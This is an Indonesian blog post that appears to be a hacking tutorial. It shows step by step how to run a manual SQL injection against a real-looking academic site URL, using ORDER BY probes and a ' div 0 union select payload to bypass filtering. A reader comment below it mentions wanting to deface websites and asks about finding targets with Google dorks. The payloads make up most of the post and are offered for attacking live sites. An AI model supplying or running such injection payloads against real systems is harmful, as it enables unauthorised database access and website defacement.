Okay kali ini mau ngebahas tentang SQL injection lagi tapi ini menggunakan ORDER BY 1000
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77
coba kita masukkan perinta :
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
coba kita ganti perintah nya seperti ini
target.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
wew pas di kecilin muncul lagi tulisan nya
berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya
udah gitu aja, semoga bermanfaat
nah ane selalu mentok disini nih kalo belajar sql injection
jadinya gak pernah bisa nge-deface wkwkane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?
No comments:
Post a Comment